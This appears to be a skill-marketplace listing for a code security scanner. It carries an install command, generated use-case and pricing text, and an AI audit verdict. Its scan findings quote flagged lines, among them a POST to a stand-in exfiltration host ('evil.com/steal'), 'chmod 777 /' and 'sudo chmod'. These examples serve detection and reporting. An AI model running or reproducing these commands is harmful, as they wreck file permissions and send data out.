yidun-skill-secIntelligent code security scanner with hybrid local-cloud detection. Fingerprints packages, runs static behavioral analysis, and consults cloud threat intell...
Install via ClawdBot CLI:
clawdbot install yd-dev/yidun-skill-secGrade Good — based on market validation, documentation quality, package completeness, maintenance status, and authenticity signals.
Sends data to undocumented external endpoint (potential exfiltration)
POST → https://evil.com/steal````Potentially destructive shell commands in tool definitions
chmod 777 /Accesses system directories or attempts privilege escalation
sudo chmodCalls external URL not in known-safe list
https://clawhub.comGenerated Mar 21, 2026
Developers and organizations can use this skill to scan third-party packages from registries like npm or PyPI before installation. It identifies malware, data leaks, and obfuscation by combining local static analysis with cloud threat intelligence, ensuring safe dependencies in software projects.
Companies can integrate this skill into their CI/CD pipelines to vet code packages from unknown or private sources. It checks for blacklisted domains and untrusted authors, providing a safety score to block high-risk packages early, reducing supply chain attack vulnerabilities.
Organizations in regulated industries, such as finance or healthcare, can use this skill to audit packages for security compliance. It logs redacted payloads for audit trails and ensures no sensitive data is transmitted, helping meet data protection standards like GDPR or HIPAA.
DevOps teams can deploy this skill to scan packages in container images or deployment scripts. It fingerprints files and runs behavioral analysis locally, with optional cloud intelligence for enhanced detection, preventing malware from entering production environments.
Academic institutions and researchers can use this skill to analyze code packages for security studies. It provides detailed threat verdicts with scores and labels, enabling hands-on learning about static analysis and hybrid detection techniques in a controlled, offline-safe manner.
Offer this skill as part of a premium security subscription, providing enhanced cloud threat intelligence and regular updates to blacklists. Revenue is generated through monthly or annual fees from organizations needing advanced package scanning and real-time threat data.
Provide a free version with basic local scanning and limited cloud access, while charging for advanced features like custom trusted registries, detailed audit logs, and priority cloud intelligence. This attracts individual developers and upsells to enterprise clients.
Monetize by offering custom integration services into existing CI/CD pipelines or security tools, along with consulting for supply chain risk management. Revenue comes from one-time setup fees and ongoing support contracts for tailored security solutions.
💬 Integration Tip
Ensure the required binaries (curl, jq, openssl) are installed and configure environment variables like YIDUN_SKILL_SEC_CLOUD to toggle cloud intelligence based on your security needs.
Scored Jun 19, 2026
AI Analysis
The skill discloses its data transmission practices transparently, sending only redacted metadata to a legitimate security service (NetEase Yidun) with clear opt-out capability. While external data transmission occurs, it's for the stated security scanning purpose with documented safeguards and user control via environment variables.
Audited Apr 16, 2026 · audit v1.0
Security-first skill vetting for AI agents. Use before installing any skill from ClawdHub, GitHub, or other sources. Checks for red flags, permission scope,...
Security scanner for AI agent skills. 9 built-in detection signatures. Identifies secrets, unsafe execution patterns, and prompt injection. Sub-50ms results.
Wallet anti-theft guard. One-click scan for high-risk wallet approvals to protect user assets. Use when a user asks for a wallet security check, wallet healt...
Comprehensive security audit for an agent's full skill stack. Chains scanner, differ, trust-verifier, and health-monitor into a single assessment with priori...
GEO Audit — AI Search Visibility Checker for ChatGPT, Perplexity, Claude & Gemini. 29-point GEO readiness checklist: robots.txt AI crawler access, Index...
Audit and analyze Solidity smart contracts for security vulnerabilities. Use when reviewing, auditing, or analyzing smart contracts, Solidity code, DeFi prot...